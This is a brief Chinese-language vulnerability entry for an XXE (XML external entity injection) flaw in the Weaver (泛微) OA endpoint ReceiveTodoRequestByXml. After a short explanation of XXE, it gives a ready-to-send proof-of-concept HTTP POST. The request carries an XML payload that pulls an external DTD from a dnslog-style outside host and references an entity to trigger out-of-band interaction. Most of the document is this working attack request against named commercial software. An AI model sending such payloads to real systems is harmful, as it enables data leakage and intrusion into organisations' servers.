漏洞描述
XXE漏洞,即XML外部实体注入漏洞,是由于应用程序处理XML输入时,未正确配置或过滤外部实体引用导致的安全漏洞。攻击者可以通过构造恶意XML数据,导致服务器端信息泄露、拒绝服务攻击、远程代码执行等严重后果。
泛微OA ReceiveTodoRequestByXml XML实体注入漏洞
PoC代码
POST /rest/ofs/ReceiveTodoRequestByXml HTTP/1.1
Host:
Content-Type: application/xml
<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE syscode SYSTEM "http://ReceiveTodoRequestByXml.xxxx.dnslog.pw/xxe">
<M><syscode>&send;</syscode></M>